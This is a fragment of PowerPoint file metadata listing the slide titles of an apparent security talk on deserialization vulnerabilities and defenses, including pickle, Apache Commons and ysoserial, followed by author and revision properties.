      <vt:lpstr>Serialized Form</vt:lpstr>
      <vt:lpstr>‘Pickling’ a Python Object</vt:lpstr>
      <vt:lpstr>What’s The difference?</vt:lpstr>
      <vt:lpstr>Secure Data Transmission?</vt:lpstr>
      <vt:lpstr>There’s the Rub </vt:lpstr>
      <vt:lpstr>DoS via Recursive References</vt:lpstr>
      <vt:lpstr>So it’s easy…</vt:lpstr>
      <vt:lpstr>Limits of Serialized Payloads</vt:lpstr>
      <vt:lpstr>The Art of Execution</vt:lpstr>
      <vt:lpstr>Attacks Through the Ages</vt:lpstr>
      <vt:lpstr>Example: Apache Commons</vt:lpstr>
      <vt:lpstr>Example: Apache Commons</vt:lpstr>
      <vt:lpstr>The Intended Use</vt:lpstr>
      <vt:lpstr>The Goal</vt:lpstr>
      <vt:lpstr>The Deserialization Call Chain</vt:lpstr>
      <vt:lpstr>Payload Construction </vt:lpstr>
      <vt:lpstr>ysoserial</vt:lpstr>
      <vt:lpstr>Other Payloads Possible?</vt:lpstr>
      <vt:lpstr>Am I Vulnerable?</vt:lpstr>
      <vt:lpstr>Am I Deserializing Objects?</vt:lpstr>
      <vt:lpstr>Am I Deserializing Objects?</vt:lpstr>
      <vt:lpstr>Defense Techniques</vt:lpstr>
      <vt:lpstr>Best Practices</vt:lpstr>
      <vt:lpstr>Best Practices</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Questions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Patrick Calder</dc:creator>
  <cp:lastModifiedBy>Mark Hoopes</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-10-03T18:23:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-02-18T20:31:27Z</dcterms:modified>
</cp:coreProperties>
</file>